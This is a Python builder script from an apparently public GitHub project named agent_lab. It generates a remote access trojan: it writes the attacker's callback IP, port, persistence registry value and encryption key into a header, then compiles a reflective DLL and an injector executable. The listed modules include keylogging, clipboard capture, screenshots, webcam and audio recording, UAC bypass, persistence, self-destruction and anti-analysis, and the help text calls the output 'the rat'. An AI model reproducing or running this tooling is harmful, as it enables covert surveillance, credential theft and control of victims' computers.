agent_lab/create.py at main · letho1608/agent_lab · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
from subprocess import Popen
from subprocess import PIPE
import sys
import os
import binascii
import platform
import time

import server.scripts.other as other

import argparse

from colorama import Fore,Style,init


class GenerateReflectivePayload:

    error = False

    def __init__(self,ip,auto, port, reco, name, registry, password):

        self.path =  os.getcwd()+"/"+"client/inc/common.h"
        self.list_const_str = ["IP_ADDRESS","NAME_PROG","PATH_ADMIN","PATH_NOT_ADMIN","NAME_KEY_REGISTER","SPLIT"]

        if(auto):
            self.auto = "true"
        else:
            self.auto = "false"

        self.reco = reco * 1000 #mileseconds

        self.port = port
        self.ip = ip
        self.name = name
        self.registry = registry

        self.key = other.generate_PBKDF2_key(password)

        other.printColor("successfully","\nKEY PBKDF2: {}".format(self.key))

        try:
            self.os  = platform.system()
        except Exception as e:
            other.printColor("error",e)
            GenerateReflectivePayload.error = True
            exit(0)
        else:
            self.main()


    def writeFile(self, data):
        try:
            file=open(self.path, "w")
            file.write(data)
            file.close()
        except Exception as e:
            other.printColor("error", "[-] an error is triggered when writing to common.h")
            other.printColor("error", str(e))
            GenerateReflectivePayload.error = True
            exit(0)

    def compileReflectiveDLL(self):
        current_path = os.getcwd()

        if(self.os == "Linux"):
            # Compile DLL trên Linux
            cmd = "i686-w64-mingw32-g++ -shared agentlab_reflective.cpp Exec.cpp other.cpp HandShake.cpp Connexion.cpp Persistence.cpp Destruction.cpp Keylogger.cpp ClipboardLogger.cpp Screenshot.cpp Webcam.cpp KeystrokeInjector.cpp UACBypass.cpp AudioRecorder.cpp FileTransfer.cpp AntiAnalysis.cpp -o {} -lws2_32 -static-libgcc -static-libstdc++ -Os -s".format(current_path+"/payload/agentlab_reflective.dll")
        elif(self.os == "Windows"):
            # Compile DLL trên Windows
            cmd = "g++ -shared agentlab_reflective.cpp Exec.cpp other.cpp HandShake.cpp Connexion.cpp Persistence.cpp Destruction.cpp Keylogger.cpp ClipboardLogger.cpp Screenshot.cpp Webcam.cpp KeystrokeInjector.cpp UACBypass.cpp AudioRecorder.cpp FileTransfer.cpp AntiAnalysis.cpp -o {} -lws2_32 -static-libgcc -static-libstdc++ -Os -s".format(current_path+"/payload/agentlab_reflective.dll")
        else:
            other.printColor("error","[-] Project is incompatible with: {}".format(self.os))
            GenerateReflectivePayload.error = True
            exit(1)

        os.chdir("client/src") #move

        with Popen(cmd, stdout=PIPE,stderr=PIPE,shell=True) as cmd:
            other.printColor("successfully","[+] Compiling reflective DLL...")
            out,err = str(cmd.stdout.read(),"UTF8",errors="ignore"),str(cmd.stderr.read(),"UTF8",errors="ignore")
            if not err:
                other.printColor("successfully","[+] Reflective DLL compiled successfully.")
            else:
                other.printColor("error","[-] An error is triggered when compiling the reflective DLL.")
                other.printColor("error",err)
                GenerateReflectivePayload.error = True
                exit(0)

    def compileInjector(self):
        current_path = os.getcwd()

        if(self.os == "Linux"):
            # Compile injector trên Linux
            cmd = "i686-w64-mingw32-g++ main.cpp reflective_injector.cpp -o {} -lws2_32 -static-libgcc -static-libstdc++ -Os -s".format(current_path+"/payload/"+self.name)
        elif(self.os == "Windows"):
            # Compile injector trên Windows
            cmd = "g++ main.cpp reflective_injector.cpp -o {} -lws2_32 -static-libgcc -static-libstdc++ -Os -s".format(current_path+"/payload/"+self.name)
        else:
            other.printColor("error","[-] Project is incompatible with: {}".format(self.os))
            GenerateReflectivePayload.error = True
            exit(1)

        os.chdir("client/src") #move

        with Popen(cmd, stdout=PIPE,stderr=PIPE,shell=True) as cmd:
            other.printColor("successfully","[+] Compiling injector...")
            out,err = str(cmd.stdout.read(),"UTF8",errors="ignore"),str(cmd.stderr.read(),"UTF8",errors="ignore")
            if not err:
                other.printColor("successfully","[+] Injector compiled successfully.")
                other.printColor("information", "[?] Location: {}\n".format(current_path+"/payload/"+self.name))
            else:
                other.printColor("error","[-] An error is triggered when compiling the injector.")
                other.printColor("error",err)
                GenerateReflectivePayload.error = True
                exit(0)

    def main(self):
        other.printColor("successfully","\n[+] Current OS: {}".format(self.os))

        # Write configuration
        self.writeFile(other.customHeader(self.ip, self.auto, self.port, self.reco, self.registry, self.key))

        # Compile reflective DLL first
        self.compileReflectiveDLL()
        time.sleep(1)

        # Compile injector
        self.compileInjector()
        time.sleep(1)

        # Rewrite default header
        self.writeFile(str(other.commonHeader()))

parser = argparse.ArgumentParser()
parser.add_argument("-a","--auto", action="store_true", default=False, help="if the parameter is added, the rat will automatically perform the persistence.")
parser.add_argument("-p","--port", dest="PORT", default=4444, help="the port number of the server.")
parser.add_argument("-i","--ip", dest="IP", required=True, help="IP address of the server.")
parser.add_argument("-r","--reconnect", dest="RECONNECT",default=20,  help="the time between each reconnection attempt if the server is offline (in seconds).")
parser.add_argument("-n","--name", dest="NAME", default="AgentLabInjector.exe", help="the name of the injector executable")
parser.add_argument("-m","--move", dest="MOVE", default=False, help="Under development...")
parser.add_argument("-rs","--registry", dest="REGISTRY_STRING", default="win64", help="the name of the value of the subkey of the windows registry.")
parser.add_argument("-pa", "--password", dest="PASSWORD", default="CISCOTHEBOSS", help="The password to generate the key to encrypt and decrypt the data. The default password is 'CISCOTHEBOSS'.")

init()

try:
    argv = vars(parser.parse_args())

    AUTO = bool(argv["auto"])
    PORT = int(argv["PORT"])
    IP  = str(argv["IP"])
    RECO = int(argv["RECONNECT"])
    NAME = str(argv["NAME"])
    REGISTRY = str(argv["REGISTRY_STRING"])
    PASSWORD = str(argv["PASSWORD"])

    if not(argv["MOVE"]):
        PATH = False
    else:
        PATH = argv["MOVE"]

    GenerateReflectivePayload(IP, AUTO, PORT, RECO, NAME, REGISTRY, PASSWORD)

except SystemExit:
    if(GenerateReflectivePayload.error):
        pass
    else:
        print("example: /usr/bin/python3 RATelGenerator.py --ip 192.0.0.1" )
except KeyboardInterrupt:
    other.printColor("information","[-] Generator stop.")